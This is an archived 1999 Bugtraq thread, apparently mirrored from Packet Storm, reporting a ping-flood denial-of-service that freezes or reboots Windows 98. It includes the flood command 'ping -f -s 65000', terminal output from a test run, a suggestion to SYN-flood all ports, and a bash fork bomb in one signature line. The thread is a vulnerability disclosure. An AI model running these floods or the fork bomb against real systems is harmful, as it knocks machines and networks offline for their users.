Lucene search
Packet StormPACKETSTORM:12291HistoryAug 17, 1999 - 12:00 a.m.
windows98.pingflood.txt
1999-08-1700:00:00
Packet Storm
packetstormsecurity.com
28
`Date: Wed, 17 Feb 1999 03:17:26 -0300
From: Fabio Bastiglia Oliva <[email protected]>
To: [email protected]
Subject: Pingflood attack against Windows98
rewt wrote:
>
> Try pinging the windows box with large amounts of icmp...I left 5
> screened pings, each set to 65000 size...Windows will freeze shortly
> after its loaded. You might also try to ping with -f.
>
Hey...
I made what you suggested, and it's true... But in my case the
results were a little worse than yours...
Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
to make several screen boxes... With only one ping -f 65000 the system
rebooted.
Best Regards
-------------------------------
Fabio Bastiglia Oliva - Director
[email protected]
Safe Networks Informatica LTDA.
http://www.safenetworks.com
----------------------------------------------------------------------
Date: Thu, 18 Feb 1999 13:32:00 -0500
From: Mark A. Heilpern <[email protected]>
To: [email protected]
Subject: Re: Pingflood attack against Windows98
At 03:17 AM 2/17/99 -0300, you wrote:
>rewt wrote:
>>
>> Try pinging the windows box with large amounts of icmp...I left 5
>> screened pings, each set to 65000 size...Windows will freeze shortly
>> after its loaded. You might also try to ping with -f.
>>
>
>Hey...
> I made what you suggested, and it's true... But in my case the
>results were a little worse than yours...
> Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
>to make several screen boxes... With only one ping -f 65000 the system
>rebooted.
I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
have had more returns than timing allowed to be displayed before I locked
up.
----------------------------------------------------------------------
Date: Thu, 18 Feb 1999 21:44:24 -0300
From: Fabio Bastiglia Oliva <[email protected]>
To: [email protected]
Subject: Re: Pingflood attack against Windows98
Hello all,
As I said before, forgive me, because my english is not so good!
I'll make a "Multi-reply" in this email... It's easier ;)
Thanks for all the replies!
------------------------------------------------------------------------
------------------------------------------------------------------------
James <[email protected]> wrote:
>
> This on a LAN or Internet or both?
>
> I made this test in my LAN.
-LAN Speed: 10Mbits.
-NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
-Hubs: 3Com Super Stack II.
-Windows98 Versions: 4.10.1998 (Portuguese and English versions)
------------------------------------------------------------------------
------------------------------------------------------------------------
Laurent LEVIER <[email protected]> wrote:
>
> I tried with the French version of Windows 98.
>
> when I run ping -l 65000 -f IPaddr.
>
> ping refuses. Of course ping -f 65000 is not accepted too.
>
> Strange the ping command changes between US & FR version.
>
Sorry, I made a mistake when sent the email to Bugtraq. The
correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is:
ping -f -s 65000 IPaddr
------------------------------------------------------------------------
------------------------------------------------------------------------
Quantum <[email protected]> wrote:
>
> I just tried it & had no success at my Win98 dos prompt,
>
Try from a linux... I got these results flooding from a
Linux Slackware 3.6 Kernel 2.0.36...
------------------------------------------------------------------------
------------------------------------------------------------------------
Tom Van Riper <[email protected]>
>
> yeah no kidding, the world has known a dialup connection weither it be
> windows or a unix type operating system, that a small amount of icmp
> packets will kill the connection for years, thats old stuff.
> try synfluding on ports 0-65535 for some real fun ;)
Hehe... But a synflood just made the LAN Communication slower,
and didn't affected Windows 98 than pingflood affected!
Tom Van Riper
Dreamscape Online
------------------------------------------------------------------------
Best Regards
-------------------------------
Fabio Bastiglia Oliva - Diretor
[email protected]
Safe Networks Informatica LTDA.
http://www.safenetworks.com
----------------------------------------------------------------------
Date: Fri, 19 Feb 1999 01:16:44 -0300
From: Fabio Bastiglia Oliva <[email protected]>
To: [email protected]
Subject: Pingflood attack against Windows98 - The Test
Hello all,
This is what is happening when I ping flood a Windows98 from a
Linux Slackware 3.6 (Kernel 2.0.36).
-Before the attack-
linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes
64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms
--- 192.168.1.4 ping statistics ---
2 packets transmitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.5/0.5/0.5 ms
-The Attack-
linux:~# ping -f -s 65000 192.168.1.4
PING 192.168.1.3 (192.168.1.4): 65000 data bytes
.......................................................................
...................................................../*After lots of
little dots... Windows98 Rebooted*/...<CTRL+C>
--- 192.168.1.4 ping statistics ---
11440 packets transmitted, 228 packets received, 98% packet loss
round-trip min/avg/max = 0.6/32.0/64.2 ms
-After the attack-
linux:~# ping 192.168.1.4
PING 192.168.1.4 (192.168.1.4): 56 data bytes
--- 192.168.1.4 ping statistics ---
4 packets transmitted, 0 packets received, 100% packet loss
---
It's what's happening here... Anyone of you got the same
results?
Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
[email protected]
Safe Networks Informatica LTDA.
http://www.safenetworks.com
----------------------------------------------------------------------
Date: Thu, 11 Feb 1999 03:43:10 +0100
From: Michal Zalewski <[email protected]>
To: [email protected]
Subject: Re: Pingflood attack against Windows98
Sorry, but I'm afraid this thread is a little bit out-of-date. Pingflood
against Windows 95/98 is a well-known shool DoS. ping -s -f or ping -s -l
over local networks seems to cause Windows to lock-on permanently (or
temporarily, depending on weather), or even reboot. Is there anything more
to talk about?:>
_______________________________________________________________________
Michal Zalewski [[email protected]] [ENSI / marchew] [dione.ids.pl SYSADM]
[lunete.nfi.pl SYSADM] [http://dione.ids.pl/lcamtuf] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
----------------------------------------------------------------------
Date: Mon, 22 Feb 1999 04:04:44 -0300
From: Fabio Bastiglia Oliva <[email protected]>
To: [email protected]
Subject: Re: Pingflood attack against Windows98
Michal Zalewski wrote:
>
> Sorry, but I'm afraid this thread is a little bit out-of-date.
> Pingflood against Windows 95/98 is a well-known shool DoS. ping -s -f
> or ping -s -l over local networks seems to cause Windows to lock-on
> permanently (or temporarily, depending on weather), or even reboot.
> Is there anything more to talk about?:>
>
Dear Mr. Zalewski,
Since Microsoft's announced that Windows 95 DoSs were corrected
in Windows 98, and we found this bug AGAIN... I think that this thread
IS NOT out-of-date.
Best Regards
--------------------------------
Fabio Bastiglia Oliva - Director
[email protected]
Safe Networks Informatica LTDA.
http://www.safenetworks.com
`